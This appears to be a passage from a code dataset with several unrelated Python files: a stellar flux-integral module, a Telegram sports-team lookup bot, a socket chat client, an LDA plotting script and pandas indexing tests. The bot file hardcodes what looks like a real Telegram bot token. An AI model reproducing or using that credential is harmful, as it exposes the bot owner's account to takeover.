os\n\n\n__all__ = [\"FluxIntegral\"]\n\n\nclass FluxIntegral:\n def __init__(\n self,\n mean_ylm,\n cov_ylm,\n udeg=defaults[\"udeg\"],\n marginalize_over_inclination=defaults[\"marginalize_over_inclination\"],\n covpts=defaults[\"covpts\"],\n ydeg=defaults[\"ydeg\"],\n **kwargs\n ):\n\n # General\n self._udeg = udeg\n self._marginalize_over_inclination = marginalize_over_inclination\n self._covpts = covpts\n self._mean_ylm = mean_ylm\n self._cov_ylm = cov_ylm\n self._ydeg = ydeg\n self._nylm = (self._ydeg + 1) ** 2\n self._angle_fac = np.pi / 180\n\n # Set up the ops\n self._special_tensordotRz = special_tensordotRzOp(ydeg, **kwargs)\n self._tensordotRz = tensordotRzOp(ydeg, **kwargs)\n self._Rx = RxOp(ydeg, **kwargs)\n self._R = R(\n self._ydeg, cos_alpha=0, sin_alpha=1, cos_gamma=0, sin_gamma=-1\n )\n self._CC = tt.extra_ops.CpuContiguous()\n\n # Get the moments of the Ylm process in the polar frame\n self._ez = tt.transpose(\n self._dotRx(tt.reshape(self._mean_ylm, (1, -1)), 0.5 * np.pi)\n )\n mom2 = self._CC(\n self._cov_ylm + tt.outer(self._mean_ylm, self._mean_ylm)\n )\n tmp = self._CC(tt.transpose(self._dotRx(mom2, 0.5 * np.pi)))\n self._Ez = 
self._dotRx(tmp, 0.5 * np.pi)\n\n # Pre-compute stuff that doesn't depend on user inputs\n self._precompute()\n\n # These parameters are star-specific and are set in\n # calls to `mean()` and `cov()`.\n self._t = None\n self._i = None\n self._p = None\n self._u = None\n\n def _dotRx(self, M, theta):\n f = tt.zeros_like(M)\n rx = self._Rx(theta)[0]\n nwig = lambda l: ((l + 1) * (2 * l + 1) * (2 * l + 3)) // 3\n for l in range(self._ydeg + 1):\n start = nwig(l - 1)\n stop = nwig(l)\n Rxl = tt.reshape(rx[start:stop], (2 * l + 1, 2 * l + 1))\n f = tt.set_subtensor(\n f[:, l ** 2 : (l + 1) ** 2],\n tt.dot(M[:, l ** 2 : (l + 1) ** 2], Rxl),\n )\n return f\n\n def _right_project(self, M, theta, inc):\n \"\"\"Apply the projection operator on the right.\n\n Specifically, this method returns the dot product `M . R`,\n where `M` is an input matrix and `R` is the Wigner rotation matrix\n that transforms a spherical harmonic coefficient vector in the\n input frame to a vector in the observer's frame.\n \"\"\"\n # Rotate to the sky frame\n M = self._dotRx(M, -inc)\n\n # Rotate to the correct phase\n M = self._tensordotRz(M, theta)\n\n # Rotate to the polar frame\n M = self._dotRx(M, 0.5 * np.pi)\n\n return M\n\n def _G(self, j, i):\n \"\"\"\n This is the integral of\n\n cos(x / 2)^i sin(x / 2)^j sin(x)\n\n from 0 to pi/2.\n \"\"\"\n return 2 * gamma(1 + 0.5 * i) * gamma(1 + 0.5 * j) / gamma(\n 0.5 * (4 + i + j)\n ) - (2 ** (1 - 0.5 * i) / (2 + i)) * hyp2f1(\n 1 + 0.5 * i, -0.5 * j, 2 + 0.5 * i, 0.5\n )\n\n def _precompute(self):\n \"\"\"\n Pre-compute some stuff that doesn't depend on\n user inputs.\n\n \"\"\"\n # First, we can pre-compute a bunch of stuff\n # using `numpy`, as it doesn't depend on tensor\n # variables.\n\n # The marginalization integral\n G = np.array(\n [\n [self._G(i, j) for i in range(4 * self._ydeg + 1)]\n for j in range(4 * self._ydeg + 1)\n ]\n )\n\n # First moment integral\n self._wnp = [None for l in range(self._ydeg + 1)]\n for l in range(self._ydeg + 1):\n m = np.arange(-l, l + 1)\n i = slice(l ** 2, (l + 1) ** 2)\n self._wnp[l] = self._R[l] @ G[l - m, l + m]\n\n # Second moment integral. Apologies for\n # how opaque this all is, since it's the result of\n # a few hours of tinkering with linear algebra to\n # maximize the number of operations *before*\n # we get theano involved.\n Q = np.empty(\n (\n 2 * self._ydeg + 1,\n 2 * self._ydeg + 1,\n 2 * self._ydeg + 1,\n self._nylm,\n )\n )\n for l1 in range(self._ydeg + 1):\n k = np.arange(l1 ** 2, (l1 + 1) ** 2)\n k0 = np.arange(2 * l1 + 1).reshape(-1, 1)\n for p in range(self._nylm):\n l2 = int(np.floor(np.sqrt(p)))\n j = np.arange(l2 ** 2, (l2 + 1) ** 2)\n j0 = np.arange(2 * l2 + 1).reshape(1, -1)\n L = (\n self._R[l1][l1, k - l1 ** 2]\n @ G[k0 + j0, 2 * l1 - k0 + 2 * l2 - j0]\n )\n R = self._R[l2][j - l2 ** 2, p - l2 ** 2].T\n Q[l1, : 2 * l1 + 1, : 2 * l2 + 1, p] = L @ R\n self._Wnp = np.empty((self._nylm, self._nylm))\n for l1 in range(self._ydeg + 1):\n i = np.arange(l1 ** 2, (l1 + 1) ** 2)\n for l2 in range(self._ydeg + 1):\n j = np.arange(l2 ** 2, (l2 + 1) ** 2)\n self._Wnp[i.reshape(-1, 1), j.reshape(1, -1)] = Q[\n l1, : 2 * l1 + 1, l2, j\n ].T\n\n def _compute_inclination_integrals(self):\n\n # In the computation of the second moment below, we implicitly\n # make use of the fact that `rTA1 = 0` if `m != 0` because\n # of symmetry. 
This vastly reduces the number of operations\n # we need to do!\n\n if self._udeg > 0:\n\n # Flux integral op\n self._rTA1 = rTA1LOp(ydeg=self._ydeg, udeg=self._udeg)(self._u)\n\n # First moment\n self._w = [None for l in range(self._ydeg + 1)]\n for l in range(self._ydeg + 1):\n i = slice(l ** 2, (l + 1) ** 2)\n self._w[l] = tt.dot(self._rTA1[i], self._wnp[l])\n\n # Second moment\n m0 = np.array([l ** 2 + l for l in range(self._ydeg + 1)])\n Z = tt.outer(self._rTA1[m0], self._rTA1[m0])\n self._W = tt.zeros((self._nylm, self._nylm))\n for l1 in range(self._ydeg + 1):\n i = np.arange(l1 ** 2, (l1 + 1) ** 2).reshape(-1, 1)\n for l2 in range(self._ydeg + 1):\n j = np.arange(l2 ** 2, (l2 + 1) ** 2).reshape(1, -1)\n self._W = tt.set_subtensor(\n self._W[i, j], self._Wnp[i, j] * Z[l1, l2]\n )\n\n else:\n\n # Get the numeric value of the flux op, since it\n # doesn't depend on any user inputs\n self._rTA1 = rTA1Op(ydeg=self._ydeg)().eval()\n\n # First moment\n self._w = [None for l in range(self._ydeg + 1)]\n for l in range(self._ydeg + 1):\n i = slice(l ** 2, (l + 1) ** 2)\n self._w[l] = self._rTA1[i] @ self._wnp[l]\n\n # Second moment\n m0 = np.array([l ** 2 + l for l in range(self._ydeg + 1)])\n Z = np.outer(self._rTA1[m0], self._rTA1[m0])\n self._W = np.zeros((self._nylm, self._nylm))\n for l1 in range(self._ydeg + 1):\n i = np.arange(l1 ** 2, (l1 + 1) ** 2).reshape(-1, 1)\n for l2 in range(self._ydeg + 1):\n j = np.arange(l2 ** 2, (l2 + 1) ** 2).reshape(1, -1)\n self._W[i, j] = self._Wnp[i, j] * Z[l1, l2]\n\n def _set_params(self, t, i, p, u):\n # Ingest\n t = cast(t, vectorize=True)\n i = CheckBoundsOp(name=\"i\", lower=0, upper=0.5 * np.pi)(\n i * self._angle_fac\n )\n p = CheckBoundsOp(name=\"p\", lower=0, upper=np.inf)(p)\n u = cast(u, vectorize=True)[: self._udeg]\n\n # Check if they are different from the cached variables\n if (\n (self._t != t)\n or (self._i != i)\n or (self._p != p)\n or (self._u != u)\n ):\n # We need to re-compute everything\n self._t = t\n self._i = i\n self._p = p\n self._u = u\n self._compute()\n\n def _interpolate_cov(self):\n \"\"\"\n Interpolate the pre-computed kernel onto a\n grid of time lags in 2D to get the full covariance.\n\n \"\"\"\n theta = 2 * np.pi * tt.mod(self._t / self._p, 1.0)\n x = tt.reshape(tt.abs_(theta[:, None] - theta[None, :]), (-1,))\n inds = tt.cast(tt.floor(x / self._dx), \"int64\")\n x0 = (x - self._xp[inds + 1]) / self._dx\n cov = tt.reshape(\n self._a0[inds]\n + self._a1[inds] * x0\n + self._a2[inds] * x0 ** 2\n + self._a3[inds] * x0 ** 3,\n (theta.shape[0], theta.shape[0]),\n )\n\n # If len(theta) == 1, return the *variance* instead\n cov = ifelse(tt.eq(theta.shape[0], 1), self._var, cov)\n return cov\n\n def _design_matrix(self):\n theta = 2 * np.pi * tt.mod(self._t / self._p, 1.0)\n rTA1 = tt.tile(self._rTA1, (theta.shape[0], 1))\n return self._right_project(rTA1, theta, self._i)\n\n def _compute(self):\n \"\"\"\n Compute some vectors and matrices used in the\n evaluation of the mean and covariance.\n\n \"\"\"\n # Compute some helper matrices\n self._compute_inclination_integrals()\n\n # If we're marginalizing over inclination, pre-compute the\n # radial kernel on a fine grid, then interpolate onto the\n # provided time array.\n if self._marginalize_over_inclination:\n\n # Compute the scalar mean\n self._mean = tt.sum(\n [\n tt.dot(self._w[l], self._ez[slice(l ** 2, (l + 1) ** 2)])\n for l in range(self._ydeg + 1)\n ]\n )\n\n # Compute the *variance*\n self._var = (\n tt.tensordot(self._W, self._Ez) - self._mean ** 2\n ) * 
tt.eye(1)\n\n            # Evaluate the kernel on a regular 1d grid in theta\n            self._dx = 2 * np.pi / self._covpts\n            self._xp = tt.arange(\n                -self._dx, 2 * np.pi + 2.5 * self._dx, self._dx\n            )\n\n            # Compute the batched tensor dot product T_ij R_ilk M_lj\n            mom2 = self._special_tensordotRz(self._W, self._Ez, self._xp)\n\n            # The actual covariance\n            yp = mom2 - self._mean ** 2\n\n            # Compute the interpolant\n            y0 = yp[:-3]\n            y1 = yp[1:-2]\n            y2 = yp[2:-1]\n            y3 = yp[3:]\n            self._a0 = y1\n            self._a1 = -y0 / 3.0 - 0.5 * y1 + y2 - y3 / 6.0\n            self._a2 = 0.5 * (y0 + y2) - y1\n            self._a3 = 0.5 * ((y1 - y2) + (y3 - y0) / 3.0)\n\n            # Compute the covariance\n            self._cov = self._interpolate_cov()\n\n        else:\n\n            A = self._design_matrix()\n\n            # Compute the scalar mean\n            self._mean = tt.dot(A, self._mean_ylm)[0]\n\n            # Compute the covariance\n            self._cov = tt.dot(tt.dot(A, self._cov_ylm), tt.transpose(A))\n\n    def design_matrix(self, t, i, p, u):\n        \"\"\"\n\n        \"\"\"\n        self._set_params(t, i, p, u)\n        return self._design_matrix()\n\n    def kernel(self, t, i, p, u):\n        \"\"\"\n\n        \"\"\"\n        self._set_params(t, i, p, u)\n        if self._marginalize_over_inclination:\n            mom2 = self._special_tensordotRz(\n                self._W,\n                self._Ez,\n                2 * np.pi * tt.mod(tt.reshape(self._t, (-1,)) / self._p, 1.0),\n            )\n            return mom2 - self._mean ** 2\n        else:\n            return self._cov[0]\n\n    def mean(self, t, i, p, u):\n        \"\"\"\n\n        \"\"\"\n        self._set_params(t, i, p, u)\n        return self._mean * tt.ones_like(self._t)\n\n    def cov(self, t, i, p, u):\n        \"\"\"\n\n        \"\"\"\n        self._set_params(t, i, p, u)\n        return self._cov\n","repo_name":"rodluger/starry_process","sub_path":"starry_process/flux.py","file_name":"flux.py","file_ext":"py","file_size_in_byte":12350,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"}
+{"seq_id":"28500405130","text":"\r\nimport telebot\r\nimport requests\r\n\r\n# a ListNode class for the cache\r\nclass ListNode:\r\n\r\n    def __init__(self, value = -1, prev=None, next=None):\r\n        self.next = next\r\n        self.prev = prev\r\n        self.value = value\r\n\r\n\r\n# LRU Cache class to keep users who recently sent a message\r\nclass Cache:\r\n\r\n    def __init__(self):\r\n        self.capacity = 10\r\n        self.linked_list_head = ListNode() # head_dummy\r\n        self.linked_list_tail = self.linked_list_head\r\n        self.key_to_value = {}\r\n        self.key_to_node = {}\r\n        self.size = 0\r\n\r\n    def get_value(self, key: int) -> dict:\r\n        if key not in self.key_to_value: # key is not in the dict\r\n            return -1\r\n\r\n        else: # key is in the dict, move the node to the end of the linked list\r\n            self.remove_from_linked_list_and_update_value(key, self.key_to_value[key])\r\n            self.add_to_linked_list_and_update_node(key, self.key_to_value[key])\r\n\r\n\r\n        return self.key_to_value[key]\r\n\r\n    def put_or_update(self, key: int, value: dict) -> None:\r\n\r\n        # remove the node from the list if the key is in the dict\r\n        if key in self.key_to_value:\r\n            self.remove_from_linked_list_and_update_value(key, value)\r\n\r\n        # add the key if not in the dict\r\n        else:\r\n            self.size += 1\r\n            self.key_to_value[key] = value\r\n\r\n        # create the new node and add to the end of the list\r\n        self.add_to_linked_list_and_update_node(key, value)\r\n\r\n        # remove the first node from the linked list if the size is bigger than the capacity\r\n        if self.size > self.capacity:\r\n            node_to_remove = self.linked_list_head.next\r\n            self.key_to_value.pop(node_to_remove.value)\r\n            self.key_to_node.pop(node_to_remove.value)\r\n\r\n            self.linked_list_head.next = node_to_remove.next\r\n\r\n            if node_to_remove.next:\r\n                node_to_remove.next.prev = self.linked_list_head\r\n\r\n            else: # node_to_remove was the tail\r\n                self.linked_list_tail = self.linked_list_head\r\n\r\n    def remove_from_linked_list_and_update_value(self, key: str, value: dict) -> None:\r\n        self.key_to_value[key] = value\r\n        node = self.key_to_node[key]\r\n        node.prev.next = node.next\r\n\r\n        if node.next:\r\n            node.next.prev = node.prev\r\n\r\n        else: # node is the tail\r\n            self.linked_list_tail = node.prev\r\n\r\n    def add_to_linked_list_and_update_node(self, key: str, value: dict) -> None:\r\n        new_node = ListNode(key)\r\n        self.linked_list_tail.next = new_node\r\n        new_node.prev = self.linked_list_tail\r\n        self.key_to_node[key] = new_node\r\n        self.linked_list_tail = new_node\r\n\r\n\r\n# telegram api info\r\ntelegram_token = \"6840332720:AAH3TnoPdotUZEanvXK4Simz9hYwDSrBV5s\"\r\nbot = telebot.TeleBot(telegram_token)\r\n\r\n# football api info, using \"https://www.thesportsdb.com/api.php\"\r\nfootball_api_key = \"3\" \r\n\r\n# basketball api info, using \"https://www.balldontlie.io/home.html#get-all-players\"\r\nbasketball_url = \"https://www.balldontlie.io/api/v1/players\"\r\n\r\n# basketball functions\r\ndef get_nba_player_team(player_name: str) -> str: # gets a player's name, and returns his team\r\n    params = {\"page\": 0, \"per_page\": 1, \"search\": player_name}\r\n    response = requests.get(basketball_url, params)\r\n    player_data = response.json()\r\n\r\n    if player_data and player_data[\"data\"]:\r\n        player_team = player_data[\"data\"][0][\"team\"][\"full_name\"]\r\n        return player_team\r\n\r\n    return \"could not find the player\"\r\n\r\n# football functions:\r\ndef get_footballer_team(player_name: str) -> str: # gets a player's name, and returns his team\r\n\r\n    # get the player's id first\r\n    football_url = f\"https://www.thesportsdb.com/api/v1/json/{football_api_key}/searchplayers.php?p={player_name}\" \r\n    response = requests.get(football_url) \r\n    player_data = response.json() \r\n    \r\n    # Check if the player exists\r\n    if player_data and player_data[\"player\"] and player_data[\"player\"][0][\"strSport\"] == \"Soccer\":\r\n        player_id = player_data[\"player\"][0][\"idPlayer\"]\r\n\r\n    else: \r\n        return \"could not find the player\"\r\n    \r\n    # find the player's team using his id\r\n    player_url = f\"https://www.thesportsdb.com/api/v1/json/{football_api_key}/lookupplayer.php?id={player_id}\"\r\n    response = requests.get(player_url)\r\n    player_team_data = response.json()\r\n    team_name = player_team_data[\"players\"][0].get(\"strTeam\")\r\n    return team_name\r\n\r\n# dict to map user_id to his current state\r\nuser_to_state = Cache()\r\n\r\n# handle a message to the telegram bot:\r\n@bot.message_handler(func=lambda message: True) \r\ndef handle_message(message):\r\n    \r\n    user_id = message.from_user.id\r\n    if user_to_state.get_value(user_id) == -1: # user is not in the cache\r\n        user_to_state.put_or_update(user_id, {\"is_sent_welcome\": False, \"is_chosen_football\": False, \"is_chosen_basketball\": False})\r\n    \r\n    answer = message.text\r\n\r\n    if not user_to_state.get_value(user_id)[\"is_sent_welcome\"]: # need to send a welcome message\r\n        bot.reply_to(message, \"hello! please choose the sport you're interested in: football or basketball\")\r\n        user_to_state.put_or_update(user_id, {\"is_sent_welcome\": True, \"is_chosen_football\": False, \"is_chosen_basketball\": False})\r\n\r\n    elif answer == \"football\": # the user chose football\r\n        bot.reply_to(message, \"please provide a footballer's name, and I will provide his team\")\r\n        user_to_state.put_or_update(user_id, {\"is_sent_welcome\": True, \"is_chosen_football\": True, \"is_chosen_basketball\": False})\r\n    \r\n    elif answer == \"basketball\": # the user chose basketball\r\n        bot.reply_to(message, \"please provide a nba player's name, and I will provide his team\")\r\n        user_to_state.put_or_update(user_id, {\"is_sent_welcome\": True, \"is_chosen_football\": False, \"is_chosen_basketball\": True})\r\n    \r\n    elif user_to_state.get_value(user_id)[\"is_chosen_football\"]: # the user is sending a footballer's name \r\n        reply = get_footballer_team(answer)\r\n        bot.reply_to(message, reply)\r\n    \r\n    elif user_to_state.get_value(user_id)[\"is_chosen_basketball\"]: # the user is sending a nba player's name \r\n        reply = get_nba_player_team(answer)\r\n        bot.reply_to(message, reply)\r\n\r\n\r\ndef get_footballer_team_test(input: str, expceted_output: str):\r\n    # arrange:\r\n    # nothing to do here\r\n\r\n    # act:\r\n    res = get_footballer_team(input).lower()\r\n    \r\n    # assert:\r\n    assert res == expceted_output, \"problem with input \" + input + \", got \" + res + \", expected \" + expceted_output\r\n\r\nget_footballer_team_test(\"messi\", \"inter miami\")\r\n\r\n\r\ndef get_nba_player_team_test(input: str, expceted_output: str):\r\n    # arrange:\r\n    # nothing to do here\r\n\r\n    # act:\r\n    res = get_nba_player_team(input).lower()\r\n    \r\n    # assert:\r\n    assert res == expceted_output, \"problem with input \" + input + \", got \" + res + \", expected \" + expceted_output\r\n\r\nget_nba_player_team_test(\"lebron\", \"los angeles lakers\")\r\n\r\n# keep the bot running\r\nif __name__ == '__main__':\r\n    bot.polling(none_stop=True)\r\n","repo_name":"Shaigoldbourt22/telegram_sports_bot","sub_path":"sports_telegram_bot.py","file_name":"sports_telegram_bot.py","file_ext":"py","file_size_in_byte":7197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"951087466","text":"import socket\nfrom netobj import ClientRecv, ClientSend\n\nclass TerminalClient(object):\n    \"\"\"Disposable client class\"\"\"\n    _addr = \"\"\n    _port = \"\"\n\n    #Socket\n    _s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    _s.settimeout(1000)\n\n    #Stop variable for client\n    _continueRunning = True\n\n    def __init__(self, addr=\"localhost\", port=4500):\n        self._addr = addr\n        self._port = port\n        print(\"TerminalClient.py: Client initialised with address\", self._addr, \"and port\", self._port)\n\n    def connect(self):\n        print(\"TerminalClient.py: Attempting connection\")\n        try:\n            print(self._addr, self._port)\n            self._s.connect((self._addr, self._port))\n            self.run()\n            return True\n        except socket.error as e:\n            print(e)\n            print(\"Client.py: Unable to connect to server\")\n            return False\n\n    def run(self):\n        clientRecv = ClientRecv.ClientRecv(self)\n        clientRecv.start()\n        clientSend = ClientSend.ClientSend(self)\n        clientSend.start()\n        while self._continueRunning:\n            pass\n","repo_name":"SoulOfSet/PyChat","sub_path":"PyChat/netobj/TerminalClient.py","file_name":"TerminalClient.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"34053848179","text":"from time import time\n\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import offsetbox\nfrom matplotlib.colors import ListedColormap\nfrom sklearn import (manifold, datasets, decomposition, ensemble, lda,\n random_projection)\n\n\ndef load_feature(filename):\n fin = open(filename)\n _ = fin.readline()\n lines = fin.readlines()\n Xlst = []\n ylst = []\n lasttype = \"\"\n num = -1\n for line in lines:\n raw = line.split(\" \")\n vec = map(float, raw[1:])\n imgtype = raw[0].split(\"_\")[0]\n if (lasttype != imgtype):\n num += 1\n lasttype = imgtype\n Xlst.append(vec)\n ylst.append(num)\n\n X = np.array(Xlst)\n y = np.array(ylst)\n return X, y\n\n\ndef plot_embedding(X, y, title=None, shownum=False):\n# x_min, x_max = np.min(X, 0), np.max(X, 0)\n# X = (X - x_min) / (x_max - x_min)\n\n cm = plt.cm.Set1\n plt.figure()\n ax = plt.subplot(111)\n if shownum:\n for i in range(X.shape[0]):\n plt.text(X[i, 0], X[i, 1], str(y[i]),\n color=plt.cm.Set1(y[i] / 10.),\n fontdict={'weight': 'bold', 'size': 9})\n else:\n for i in range(0, 5):\n ax.scatter(X[i::5, 0], X[i::5, 1], marker='x', c=y[i::5], cmap=cm, alpha = 0.5)\n plt.xticks([]), plt.yticks([])\n if title is not None:\n plt.title(title)\n\n\ndef visualize(X, y):\n X2 = X.copy()\n X2.flat[::X.shape[1] + 1] += 0.01 # Make X invertible\n t0 = time()\n X_lda = lda.LDA(n_components=2).fit_transform(X2, y)\n plot_embedding(X_lda, y,\n \"Linear Discriminant projection (time %.2fs)\" %\n (time() - t0))\n plt.show()\n\nif __name__ == '__main__':\n X, y = load_feature(sys.argv[1])\n visualize(X, y)\n","repo_name":"YueDayu/AdvancedDataStructureProj2","sub_path":"training/Visualize/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73036096373","text":"import numpy as np\nimport pandas as pd\nfrom pandas.core import common as com\nfrom pandas import (compat, DataFrame, option_context,\n Series, MultiIndex, date_range, Timestamp)\nfrom pandas.util import testing as tm\n\n\nclass TestCaching(tm.TestCase):\n\n def test_slice_consolidate_invalidate_item_cache(self):\n\n # this is chained assignment, but will 'work'\n with option_context('chained_assignment', None):\n\n # #3970\n df = DataFrame({\"aa\": compat.lrange(5), \"bb\": [2.2] * 5})\n\n # Creates a second float block\n df[\"cc\"] = 0.0\n\n # caches a reference to the 'bb' series\n df[\"bb\"]\n\n # repr machinery triggers consolidation\n repr(df)\n\n # Assignment to wrong series\n df['bb'].iloc[0] = 0.17\n df._clear_item_cache()\n self.assertAlmostEqual(df['bb'][0], 0.17)\n\n def test_setitem_cache_updating(self):\n # GH 5424\n cont = ['one', 'two', 'three', 'four', 'five', 'six', 'seven']\n\n for do_ref in [False, False]:\n df = DataFrame({'a': cont,\n \"b\": cont[3:] + cont[:3],\n 'c': np.arange(7)})\n\n # ref the cache\n if do_ref:\n df.ix[0, \"c\"]\n\n # set it\n df.ix[7, 'c'] = 1\n\n self.assertEqual(df.ix[0, 'c'], 0.0)\n self.assertEqual(df.ix[7, 'c'], 1.0)\n\n # GH 7084\n # not updating cache on series setting with slices\n expected = DataFrame({'A': [600, 600, 600]},\n index=date_range('5/7/2014', '5/9/2014'))\n out = DataFrame({'A': [0, 0, 0]},\n index=date_range('5/7/2014', '5/9/2014'))\n df = DataFrame({'C': ['A', 'A', 'A'], 'D': [100, 200, 300]})\n\n # loop through df to update out\n six = Timestamp('5/7/2014')\n eix = Timestamp('5/9/2014')\n for ix, row in df.iterrows():\n 
out.loc[six:eix, row['C']] = out.loc[six:eix, row['C']] + row['D']\n\n tm.assert_frame_equal(out, expected)\n tm.assert_series_equal(out['A'], expected['A'])\n\n # try via a chain indexing\n # this actually works\n out = DataFrame({'A': [0, 0, 0]},\n index=date_range('5/7/2014', '5/9/2014'))\n for ix, row in df.iterrows():\n v = out[row['C']][six:eix] + row['D']\n out[row['C']][six:eix] = v\n\n tm.assert_frame_equal(out, expected)\n tm.assert_series_equal(out['A'], expected['A'])\n\n out = DataFrame({'A': [0, 0, 0]},\n index=date_range('5/7/2014', '5/9/2014'))\n for ix, row in df.iterrows():\n out.loc[six:eix, row['C']] += row['D']\n\n tm.assert_frame_equal(out, expected)\n tm.assert_series_equal(out['A'], expected['A'])\n\n\nclass TestChaining(tm.TestCase):\n\n def test_setitem_chained_setfault(self):\n\n # GH6026\n # setfaults under numpy 1.7.1 (ok on 1.8)\n data = ['right', 'left', 'left', 'left', 'right', 'left', 'timeout']\n mdata = ['right', 'left', 'left', 'left', 'right', 'left', 'none']\n\n df = DataFrame({'response': np.array(data)})\n mask = df.response == 'timeout'\n df.response[mask] = 'none'\n tm.assert_frame_equal(df, DataFrame({'response': mdata}))\n\n recarray = np.rec.fromarrays([data], names=['response'])\n df = DataFrame(recarray)\n mask = df.response == 'timeout'\n df.response[mask] = 'none'\n tm.assert_frame_equal(df, DataFrame({'response': mdata}))\n\n df = DataFrame({'response': data, 'response1': data})\n mask = df.response == 'timeout'\n df.response[mask] = 'none'\n tm.assert_frame_equal(df, DataFrame({'response': mdata,\n 'response1': data}))\n\n # GH 6056\n expected = DataFrame(dict(A=[np.nan, 'bar', 'bah', 'foo', 'bar']))\n df = DataFrame(dict(A=np.array(['foo', 'bar', 'bah', 'foo', 'bar'])))\n df['A'].iloc[0] = np.nan\n result = df.head()\n tm.assert_frame_equal(result, expected)\n\n df = DataFrame(dict(A=np.array(['foo', 'bar', 'bah', 'foo', 'bar'])))\n df.A.iloc[0] = np.nan\n result = df.head()\n tm.assert_frame_equal(result, expected)\n\n def test_detect_chained_assignment(self):\n\n pd.set_option('chained_assignment', 'raise')\n\n # work with the chain\n expected = DataFrame([[-5, 1], [-6, 3]], columns=list('AB'))\n df = DataFrame(np.arange(4).reshape(2, 2),\n columns=list('AB'), dtype='int64')\n self.assertIsNone(df.is_copy)\n df['A'][0] = -5\n df['A'][1] = -6\n tm.assert_frame_equal(df, expected)\n\n # test with the chaining\n df = DataFrame({'A': Series(range(2), dtype='int64'),\n 'B': np.array(np.arange(2, 4), dtype=np.float64)})\n self.assertIsNone(df.is_copy)\n\n def f():\n df['A'][0] = -5\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n def f():\n df['A'][1] = np.nan\n\n self.assertRaises(com.SettingWithCopyError, f)\n self.assertIsNone(df['A'].is_copy)\n\n # using a copy (the chain), fails\n df = DataFrame({'A': Series(range(2), dtype='int64'),\n 'B': np.array(np.arange(2, 4), dtype=np.float64)})\n\n def f():\n df.loc[0]['A'] = -5\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n # doc example\n df = DataFrame({'a': ['one', 'one', 'two', 'three',\n 'two', 'one', 'six'],\n 'c': Series(range(7), dtype='int64')})\n self.assertIsNone(df.is_copy)\n expected = DataFrame({'a': ['one', 'one', 'two', 'three',\n 'two', 'one', 'six'],\n 'c': [42, 42, 2, 3, 4, 42, 6]})\n\n def f():\n indexer = df.a.str.startswith('o')\n df[indexer]['c'] = 42\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n expected = DataFrame({'A': [111, 'bbb', 'ccc'], 'B': [1, 2, 3]})\n df = DataFrame({'A': ['aaa', 'bbb', 'ccc'], 'B': [1, 2, 3]})\n\n def f():\n df['A'][0] = 
111\n\n        self.assertRaises(com.SettingWithCopyError, f)\n\n        def f():\n            df.loc[0]['A'] = 111\n\n        self.assertRaises(com.SettingWithCopyError, f)\n\n        df.loc[0, 'A'] = 111\n        tm.assert_frame_equal(df, expected)\n\n        # make sure that is_copy is picked up reconstruction\n        # GH5475\n        df = DataFrame({\"A\": [1, 2]})\n        self.assertIsNone(df.is_copy)\n        with tm.ensure_clean('__tmp__pickle') as path:\n            df.to_pickle(path)\n            df2 = pd.read_pickle(path)\n            df2[\"B\"] = df2[\"A\"]\n            df2[\"B\"] = df2[\"A\"]\n\n        # a spurious raise as we are setting the entire column here\n        # GH5597\n        from string import ascii_letters as letters\n\n        def random_text(nobs=100):\n            df = []\n            for i in range(nobs):\n                idx = np.random.randint(len(letters), size=2)\n                idx.sort()\n                df.append([letters[idx[0]:idx[1]]])\n\n            return DataFrame(df, columns=['letters'])\n\n        df = random_text(100000)\n\n        # always a copy\n        x = df.iloc[[0, 1, 2]]\n        self.assertIsNotNone(x.is_copy)\n        x = df.iloc[[0, 1, 2, 4]]\n        self.assertIsNotNone(x.is_copy)\n\n        # explicitly copy\n        indexer = df.letters.apply(lambda x: len(x) > 10)\n        df = df.ix[indexer].copy()\n        self.assertIsNone(df.is_copy)\n        df['letters'] = df['letters'].apply(str.lower)\n\n        # implicitly take\n        df = random_text(100000)\n        indexer = df.letters.apply(lambda x: len(x) > 10)\n        df = df.ix[indexer]\n        self.assertIsNotNone(df.is_copy)\n        df['letters'] = df['letters'].apply(str.lower)\n\n        # implicitly take 2\n        df = random_text(100000)\n        indexer = df.letters.apply(lambda x: len(x) > 10)\n        df = df.ix[indexer]\n        self.assertIsNotNone(df.is_copy)\n        df.loc[:, 'letters'] = df['letters'].apply(str.lower)\n\n        # should be ok even though it's a copy!\n        self.assertIsNone(df.is_copy)\n        df['letters'] = df['letters'].apply(str.lower)\n        self.assertIsNone(df.is_copy)\n\n        df = random_text(100000)\n        indexer = df.letters.apply(lambda x: len(x) > 10)\n        df.ix[indexer, 'letters'] = df.ix[indexer, 'letters'].apply(str.lower)\n\n        # an identical take, so no copy\n        df = DataFrame({'a': [1]}).dropna()\n        self.assertIsNone(df.is_copy)\n        df['a'] += 1\n\n        # inplace ops\n        # original from:\n        # http://stackoverflow.com/questions/20508968/series-fillna-in-a-multiindex-dataframe-does-not-fill-is-this-a-bug\n        a = [12, 23]\n        b = [123, None]\n        c = [1234, 2345]\n        d = [12345, 23456]\n        tuples = [('eyes', 'left'), ('eyes', 'right'), ('ears', 'left'),\n                  ('ears', 'right')]\n        events = {('eyes', 'left'): a,\n                  ('eyes', 'right'): b,\n                  ('ears', 'left'): c,\n                  ('ears', 'right'): d}\n        multiind = MultiIndex.from_tuples(tuples, names=['part', 'side'])\n        zed = DataFrame(events, index=['a', 'b'], columns=multiind)\n\n        def f():\n            zed['eyes']['right'].fillna(value=555, inplace=True)\n\n        self.assertRaises(com.SettingWithCopyError, f)\n\n        df = DataFrame(np.random.randn(10, 4))\n        s = df.iloc[:, 0].sort_values()\n        tm.assert_series_equal(s, df.iloc[:, 0].sort_values())\n        tm.assert_series_equal(s, df[0].sort_values())\n\n        # false positives GH6025\n        df = DataFrame({'column1': ['a', 'a', 'a'], 'column2': [4, 8, 9]})\n        str(df)\n        df['column1'] = df['column1'] + 'b'\n        str(df)\n        df = df[df['column2'] != 